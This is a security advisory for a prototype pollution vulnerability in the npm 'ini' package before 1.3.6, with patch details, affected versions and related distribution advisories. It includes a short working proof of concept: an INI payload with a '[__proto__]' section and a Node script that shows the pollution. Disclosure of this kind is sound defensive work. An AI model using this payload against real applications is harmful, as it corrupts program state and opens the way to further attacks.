[NPM:GHSA-QQGX-2P2H-9C37] ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse
Severity
High
Affected Packages
1
Fixed Packages
1
CVEs
1
Overview
The ini
npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with ini.parse
, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini
[__proto__]
polluted = "polluted"
poc.js:
```
var fs = require('fs')
var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
```
```
node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```
Package | Affected Version |
---|---|
pkg:npm/ini | < 1.3.6 |
Package | Fixed Version |
---|---|
pkg:npm/ini | = 1.3.6 |
- ID
- NPM:GHSA-QQGX-2P2H-9C37
- Severity
- high
- URL
- https://github.com/advisories/GHSA-qqgx-2p2h-9c37
- Published
-
2020-12-10T16:53:45
(3 years ago) - Modified
-
2023-08-31T23:39:55
(12 months ago) - Rights
- NPM Security Team
- Other Advisories
-
- ALSA-2021:0548
- ALSA-2021:0549
- ALSA-2021:0551
- ALSA-2021:5171
- ALSA-2022:0350
- ALSA-2022:6595
- ELSA-2021-0548
- ELSA-2021-0549
- ELSA-2021-0551
- ELSA-2021-5171
- ELSA-2022-0350
- ELSA-2022-6595
- RHSA-2021:0548
- RHSA-2021:0549
- RHSA-2021:0551
- RHSA-2021:5171
- RHSA-2022:0350
- RHSA-2022:6595
- RLSA-2021:0548
- RLSA-2021:0549
- RLSA-2021:0551
- RLSA-2021:5171
- RLSA-2022:0350
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | Exploits | PoC | Pubblication Date | Modification Date |
---|---|---|---|---|---|---|---|---|---|---|---|
# CVE | Description | CVSS | EPSS | EPSS Trend (30 days) | Affected Products | Weaknesses | Security Advisories | PoC | Pubblication Date | Modification Date |